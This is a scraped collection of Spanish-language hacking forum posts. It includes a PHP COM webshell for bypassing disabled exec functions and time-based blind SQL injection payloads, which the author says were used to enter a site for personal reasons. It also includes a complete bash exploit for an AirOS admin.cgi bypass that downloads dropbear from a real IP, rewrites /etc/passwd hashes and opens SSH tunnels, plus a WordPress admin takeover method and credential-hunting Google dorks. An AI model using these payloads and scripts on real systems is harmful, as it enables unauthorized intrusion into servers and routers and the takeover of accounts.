Buen post, aunque es un tema bastante viejito es una vulnerabilidad bastante desacreditada ademas saludos!

Modificando la variable de entorno $PS1 aca te dejo un paper de como personalizar el prompt de linux You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Escribo este mini post, para hablar sobre el tema de evacion de ejecucion de comandos en servidores Windows, es que hace poquito subi una webshell a un Windows NT, y me encontre con las siguientes funciones denegadas:

system
shell
exec
system_exec
shell_exec
mysql_pconnect
passthru
popen
proc_open
proc_close
proc_nice
proc_terminate
proc_get_status
escapeshellarg
escapeshellcmd



Ademas recorde que el usuario Abnormality tenia el mismo problema asi que por que no aclararlas en este escrito, ademas de hablar un poco sobre las maneras que pueden haber para saltearnos esta restriccion que el administrador impuso dentro del php.ini, en mi caso me tope con un server que corre dos tecnologias web como lo son PHP y ASP, otras cosas a tener en cuenta pegandole una ojeada a la imagen son las siguientes:

-Base de datos MSSQL corriendo en local.

-Lenguaje Perl activo

-ASP

-De ahora en mas ya tenemos dos maneras posibles de ejecutar comnados en el servidor, una es utlizando alguna webshell en perl, como por ejemplo la tan conocida "CGI telnet", pero ademas de incluir un .htaccess que nos agregue la extencion .pl dentro del modulo del servidor, vamos a tener que modificar la ruta #!/usr/bin/perl por el path en el que se encuentra instalado perl, por defecto esta es #!C:\Program Files\perl\perl.exe pero podria estar instalado en otra hubicacion, para eso podriamos buscar la existencia de algun perlinfo.cgi el cual es un fichero que guarda informacion de perl similar a info.php, hay podriamos buscar el path del mismo.

- Otra manera seria ingresando a la base de datos MSSQL con privilegios de SA y ejecutar comandos mediante la funcion XP_CMDSHELL, esto lo podriamos hacer indagando en los scripts *.asp (formularios de autentificacion) de los demas dominios que conviven en el servidor, ya que no se me impedia moverme libremente por el mismo y leer ficheros dentro de lo que son los directorios web. Obviamente se debe a una mala configuracion de los permisos.

- Tambien podemos subir un shell en ASP.



Y por ultimo llegamos al uso de COM en php, 

Basicamente y sin dar muchas vueltas COM permite interactuar con las aplicaciones de windows,  fue desarrlollado para trabjar con POO (programacion orientada a objetos) y esta compuesto por objetos como You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el cual permite interactuar con programas como el regedit, acceso a los directorios del sistema, entre otras tareas.

De esta manera investigando a pleno me encuentro con el siguiente script programado por hadi-kiamarsi en php:

<?php

error_reporting(E_ALL);

if (isset($_GET['hk']) and !empty($_GET['hk']))
{
    $nuevo=new COM('WScript.Shell') or die('Unable to Load Activex'); //se crea el objeto WScript.Shell
    $salida=$nuevo->exec($_GET['hk']); //variable de entrada para ejecucion de comandos a travez de WScript mediante exec()
    echo "<pre>";
    echo $salida->stdout->readall; // obtencion de datos mediante stdout->readall
    echo "</pre>";
}
?>

El cual me premitio cumplir con mi objetivo en el servidor, lo comente un poco para que se entienda aunque es bastante sencillo e intuitivo.



Saludos y espero que hayan aprendido algo nuevo, por mi parte me alegro de cada dia aparezcan nuevos desafios para seguir dandole para adelante con el conocimiento y la curiosidad!

CitarEsta buena esta teoria. 2 cosas, una: porque usas numeros aparentemente aleatorios cuando haces la comparacion de > en vez de usar busqueda binaria?

No entiendo esta pregunta? estoy usando busqueda binaria...con respecto a lo de los 5 seg tenes toda la razon, tambien se mezcla con el delay de HTTP puede durar mas incluso pero a nivel mysql dura 5 seg exactos

Mientras "auditaba" una web, lo digo entre comillas por que no me dedico a eso en lo laboral, mas bien me encontraba tratando de ingresar a un sitio por cuestiones personales, me encontre con una variante de inyeccion sql dando por descartado las demas a travez de las respuestas que generaba el servidor, una "Blind mysqli basada en tiempo", paso a explicar a quienes no se encuntren familiarizados con este tipo de inyeccion.
Basicamente una "Blind mysqli basada en tiempo" se trata de inyectar a ciegas como toda blind, en mi caso utilizando la tecnica de busqueda binaria (la mas comunmente utilizada en estas situaciones) pero se da cuando la aplicacion muestra el mismo mensaje TRUE OR FALSE, es decir que da los mismo inyectar un OR 1=1 que un OR 2+5/87=9999999999 el sitio web nos seguira mostrando el mismo mensaje de error, o puede deberse a realizar una carga incorrecta del contenido web, o cualquier otra desvariacion en el sitio, da lo mismo la aplicacion resulta vulnerable pero no podremos deducir cual es la inyeccion correcta.
Para estas situaciones, podemos hacer uso de la funcion sleep() y la estructura condicional if(), ahora paso a explicar la sintaxis de cada una de estas.

La sintaxis de if es la siguiente:

if(<condicion>,<si la condicion se cumple>,<si la condicion no se cumple>)

Por ejemplo:

mysql> select if(1=1, 'Verdadero es igual!', 'Falso no es igual!');
+------------------------------------------------------+
| if(1=1, 'Verdadero es igual!', 'Falso no es igual!') |
+------------------------------------------------------+
| Verdadero es igual!                                  |
+------------------------------------------------------+
1 row in set (0.00 sec)

sleep() se utiliza para producir una pausa de tantos segundos, vamos a combinarlo con if() e imponerlo si la condicion no se cumple.

mysql> select if(1='q3rv0', 'Verdadero es igual!', sleep(3));
+------------------------------------------------+
| if(1='q3rv0', 'Verdadero es igual!', sleep(3)) |
+------------------------------------------------+
| 0                                              |
+------------------------------------------------+
1 row in set, 1 warning (3.00 sec)

Como vemos la condicion dio como resultado falsa y se le introdujo un retardo de 3 seg ante dicha respuesta.

ahora se pueden imaginar el resultado del vector al combinar ambas funciones con una blind sqli??

No se trata de nada rebuscado, solo hay que utilizar como condicion el vector sqli para dicha inyeccion por ejemplo:

Empezemos desde cero, supongamos que encontraron una web vulnerable que da con el perfil de este tipo de inyeccion y queremos verificar que en realidad se trata de esta, comenzariamos por introcir el siguiente vector en el parametro devil.

http://vuln-bsqli-based-time/?devil=5 or 1=if(1=1,sleep(5),0)--   > 5 segundos(TRUE)

http://vuln-bsqli-based-time/?devil=5 or 1=if(1=9999,sleep(5),0)--  > FALSE

Ahora ya nos damos una idea de como inyectar en la aplicacion comenzando por obtener el listado de las tablas en la base de datos, normalmente en una blind sqli seria de la siguiente manera:

http://vuln-bsqli/?devil=5 or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>15-- TRUE

http://vuln-bsqli/?devil=5 or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>50-- TRUE

http://vuln-bsqli/?devil=5 or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>100-- FALSE

http://vuln-bsqli/?devil=5 or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>68-- FALSE

http://vuln-bsqli/?devil=5 or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=67-- TRUE

Veamos como queda armado el vector haciendo uso de nuestro amigo "el tiempo":

http://vuln-bsqli-based-time/?devil=5 or 1=if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>15,sleep(5),0)-- TRUE 5 segundos

http://vuln-bsqli-based-time/?devil=5 or 1=if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>50,sleep(5),0)-- TRUE 5 segundos

http://vuln-bsqli-based-time/?devil=5 or 1=if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>100,sleep(5),0)-- FALSE

http://vuln-bsqli-based-time/?devil=5 or 1=if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>68,sleep(5),0)-- FALSE

http://vuln-bsqli-based-time/?devil=5 or 1=if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=67,sleep(5),0)-- TRUE 5 segundos

Sencillo, lo unico que tiene de rebuscado esta tecnica es mantener la pasciencia mienstras se lleva a cabo la inyeccion manualmente.

Besitos!
           

[Q]3rV[0]   

Indagando en busca de vulnerabilidades, me cruzo con un input vulnerable a SQLI el cual esta siendo filtrado por un WAF, posiblemente Mod_security, bastante mal configurado, en el video se puede ver como realize una una simple evacion de este a travez de /*!*/ y funciones como unhex(), hex() espero que lo disfruten...saludos!!


Video: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No sabría explicarte,pero lo intentaré:

La Injección SQL no tiene nada qué ver con el desfacing,simplemente es un fallo qué aprovechamos para sacar la Base de Datos. En este caso,no salió el "Error Syntax".

Espero qué te haya servido,aunque no creo. Explicar no es lo mío.

uhm no soy experto en defacing, pero si te puedo decir porque se php, que esos errores no están siendo mostrados por un mysql_error, al no tener el retorno de errores no estoy muy seguro si la injección se puede hacer, de hecho no se si realmente son errores de sql o de que no devuelve ningún valor y no puede ejecutar ciertas funciones.

saludos!

La injeccion puede hacerse correctamente utilizando la tecnica UNION SELECT lo acabo de verificar

Esa web esta re contra owneada man (Hacked By LulzSec Guatemala), hay varios pastebin con ese hash,  buscate otra y que sea virgen...

Skryllex

Te dejo una lista de tarjetas compatibles con la suite aircrack:

   

Atheros
    Prism
    Centrino
    Atmel
    Zydas
    ACX
    ralink
    realtek

Consulta por aca si deseas informarte mejor  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Podes usar la funcion header()

header("Location: http://host.com/index.php");

Por lo tanto tu script quedaria de la siguiente  forma:

<?php

            //Recibo las variables de formulario
            $nombre = $_POST['nombre'];
            $mail = $_POST['email'];
            $mensaje = $_POST['mensaje'];

            //Te muestro las variables

            echo "<h3>El mensaje que has enviado es: </h3>";
            echo "<br />";
            echo "<p>Nombre: ";
            echo "<br />";
            echo $nombre;
            echo "<br />";
            echo "Email: ";
            echo "<br />";
            echo $mail;
            echo "<br />";
            echo "Mensaje: ";
            echo "<br />";
            echo $mensaje;
            echo "</p>";

            //Envio un email
            $aquien ="[email protected]";
            $asunto = "Has recibido un correo de Only Labs";
            $mensajemail = $nombre." con el email: ".$mail." te ha enviado un mensaje: ";

            if(mail($aquien,$asunto,$mensaje,$mensajemail))
            {
               echo "Tu email se envio correctamente, en breve te respodneremos. Gracias";
               sleep(2);
               header("Location: http://host.com/index.php");
            }
            else
            {
               echo "El envio del mail ha fallado, intentalo otra vez";
               sleep(2);
               header("Location: http://host.com/formulario.php");
            }
            ?> 

Que mejor que programar mientras te hacen un bucal!

Yo agregaria:

- Entornos de Lamp security

- Hackardemic 1 y 2

- Entornos sauron (medium y hard)

Articulo que escribio mi amigo Nineain, despues de amagar varias veces con hacerlo, por fin se digno ese vago a teclear un par de lineas:P.
Por supuesto que la vulnerabilidad es vieja!, seguro mas de uno anduvo jugando con algun que otro AirOs vuln, pero lo que no se explico, mas alla de como realizar la debida explotacion del bug a travez de una peticion de url forzada, fue la post explotacion de los mismos y una leve introduccion  a la arquitectura del O.S de los dispositivos.

Se los de dejo para que le echen una ojeada.







En Diciembre del 2011, sd de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login liberó un 0day que afectaba a los sistemas AirOS (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) el cual fue parcheado aunque, como suele ser costumbre, no todos los sistemas han sido actualizados.

No quiero entrar en debate de si los responsables son los usuarios, o el desarrollador, simplemente expongo el tema.

Todo esto y algo más, fue reportado a Ubiquiti, los cuales al principio agradecieron la aportación, pero en el segundo contacto pasaron del tema y ni siquiera contestaron. Consideramos que ha pasado el suficiente tiempo como para publicar la información.

Todas las pruebas han sido realizadas en dispositivos propios, en ningún momento en ajenos. Este aporte es meramente informativo, y no me responsabilizo del mal uso que se le pueda dar a esta información.

Me gustaria agradecer por su inestimable trabajo a PunkiD y MARCOSCARS02.

Voy a comenzar con algunos conceptos básicos necesarios para entender el reporte:

¿Qué es un AirOS y que 0day es este?

AirOS es un sistema operativo avanzado, creado por Ubiquiti, capaz de manejar un sistema Wireless, enrutamiento y mínimas características ips y seguridad. Un sistema operativo para routers que busca la sencillez y la facilidad, siendo muy intuitivo, mas información en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hablemos un poco del hardware. Las CPU's de los sistemas AirOS son procesadores mips (Microprocessor without Interlocked Pipeline Stages). Es una arquitectura que consume muy pocos recursos y tiene una funcionalidad aceptable. Al ser de arquitectura distinta a la de los PC's convencionales (generalmente de 32 o 64 bits), si queremos compilar algo para mips, necesitamos recurrir a la crosscompilación, es decir, compilar un programa/servicio para una arquitectura distinta a la máquina en la que estamos trabajando. Tras muchas pruebas, recurrimos a Buildroot, una utilidad de uclib que permite desde compilar el toolchain hasta herramientas típicas y básicas, una imagen de sistema, etc.

El 0day afectaba al archivo admin.cgi, el cual es capaz de mostrar el panel "Device Administration Utility" que contiene:

        Un Uploader.
        Un Chmod.
        Un Downloader.
        Una Shell.

Imágen del panel login:




Imágen del panel de administración:



Explotación

El usuario y la contraseña por defecto de los AirOS son:
    Usuario: ubnt
    Contraseña: ubnt

Se recomienda usar Shodan para la búsqueda de dispositivos AirOS, pero este tipo de búsquedas dejan escapar muchos dispositivos. Actualmente trabajamos en un scanner por rangos de IP para localizar todos.

Se puede observar que el error consiste en cambiar la url de una petición de login al cgi; /login.cgi/uri=/ por /admin.cgi/$vuln .
Siendo $vuln cualquiera de los sientes: *.ico *.gif, *.jpg, *.js, *.css, airview.jar.pack.gz, airview_manager.jnlp, airview.jnlp, airview.uavr.
Por ejemplo: http://IPairos/admin.cgi/lol.css
De esta forma conseguimos el panel de administración, para muchos el fin, pero esto es solo el principio.

Postexplotación

El sistema operativo que lleva montado, por defecto solo tiene permisos de lectura en la mayoría de los directorios del dispositivo. Pero en /etc hay permisos de escritura, así pues tenemos un /etc/persistent/ a modo de home en el dispositivo. Lo primero es tener consola root en el dispositivo, para poder tener el control total. A través del panel subimos y ejecutamos dropbear mas su respectiva key crosscompilados.

De esta forma ya hemos conseguido ssh. A partir de aquí, vuestra imaginación es lo importante, para ver el potencial de estos dispositivos.
Tras tener funcionales todos los binarios, tenemos un "miniserver" externo:



Tenemos un pequeño directorio con un puñado de binarios ya crosscompilados y listos para AirOS disponible en:

    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Y empaquetado en .tar:

    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Incluso podríamos incluir algunos más como ngircd (Un pequeño servidor IRC), o lo que se nos ocurra.

A continuación, vamos a pasar a automatizar estas tareas. Obviamente no puedo publicar más que un par de lineas para deja la imaginación flotar con bash y curl:

runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }

Aplicaciones

Algunas de las cosas que se pueden hacer con estos dispositivos son:

        Encadenar AirOS a modo de proxys (SSH Tunneling).
        Shells de IRC.
        Bots.
        Servidor IRC.
        Servidor Web/ftp/etc
        Y muchas otras que podais imaginar.

Automatización del proceso

Pasemos a automatizar todo el proceso anterior. Para ello utilizaremos el airosh de la siguiente manera:

./airosh IPairos

El script se ejecutará y automáticamente comprobará si el dispositivo es vulnerable. Si es así, procederá a subir Dropbear, y a cambiar las claves de acceso, con contraseña:lol. De esta forma, habremos conseguido el acceso al dispositivo como administrador.



CODIGO: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#!/bin/bash

host=$1
portlocal=$2
hostfinal=$3
portfinal=$4
unset c
usage() {
        # ./airosh IP
        exit 1
}
[[ -z "$host" ]] && c=1
[[ -z "$portlocal" ]] && c=2
[[ -z "$hostfinal" ]] && c=2
[[ -z "$portfinal" ]] && c=2

if [[ $c = 1 ]]; then
        echo "FAILED!"
        usage
else
        echo "OK"
fi
runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }

runcmd 'cd /var/persistent;wget -q http://5.175.223.63/dropbearkey;wget -q http://5.175.223.63/dropbear;chmod +x dropbearkey dropbear;'  >>/tmp/airos.log

runcmd "[[ -e /var/sshd/lol.rsa ]] || ./dropbearkey -t rsa -f /var/sshd/lol.rsa" >>/tmp/airos.log

runcmd "./dropbear -b /var/sshd/motd -r /var/sshd/lol.rsa;" >>/tmp/airos.log

runcmd 'sed -i -e "s/:[^:]*:/:$1$.et5JTtj$6U9j6CSf7g3lNfhFenOX11:/" /etc/passwd;cat /etc/passwd'

echo -en "| >>user: "
read usr
[[ -z "$usr" ]] && usr=admin

if [[ "$c" = 2 ]]; then
        ssh -C "$usr@$host"
else
        ssh -g -L "0.0.0.0:$portlocal:$hostfinal:$portfinal" "$usr@$host"
fi
</pre>

                                                                                                                                            Besos, Nineain

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Otra cosa que podrías hacer dejando de lado las tools es verificar si el path se encuentra en el fichero robots.txt, también verificar si está siendo indexado por google con dorks como el sig "site:host.com intext:(login:|password:|usuario:|clave:)" de hay en más podés ir variando la busqueda, en caso de no encontrarlo es posible que el host esté siendo administrado desde otro punto, como una cuenta ftp

Solamente su correo  y el token necesitas  como lo explique en el anterior mensaje.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Primero Que nada Pone Restaurar contraseña ... luego con sql injection te vas a la tabla  " user_activation_key " o otro nombre no recuerdo
del codigo que te dan lo copias...


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
listo cambias la contraseña ! cuidate no expliqe mucho

Le pongo un poco mas de detalle

Busca el panel del CMS que por defecto se encuentra en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Utiliza la opcion de resetear el password You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Introduci el mail del admin, o del usuario al cual quieras resetear el password, obtenido a travez de la sqli verificando el campo user_mail en la tabla wp_users

Una vez que ingreses el mail, se enviara una url como esta al mismo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginJKr7T7OÑlszfP&login=admin

Ese token se genera y se guarda en la db, para ser validado luego

Lo unico que tenes que hacer es, modificar ese parametro por el token real, que lo vas a encontrar en el campo user_activation_key de la tabla wp_users

Por ultimo se te redireccionara a la pagina para ingresar el nuevo password para el usuario admin.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy inetersante, lastima que esta en ingles, a y el enlace de descarga no me funciona...

El enlace anda perfecto amigo, fijate bien

Dando vueltas por vimeo, me paso por el canal de offensive security y me encuentro con un completo video en el que los chicos graban la realizacion desde cero del proceso de pentesting llevado a cabo en el mundo real. Aunque el material no es reciente y lleva mas de un año, lo expongo por que le va a venir al pelo a mas de uno, como orientacion en la metodologia de seguridad.

Video: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Enlace de Descarga del video : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es >MYSQL 4.1

Es MySQL5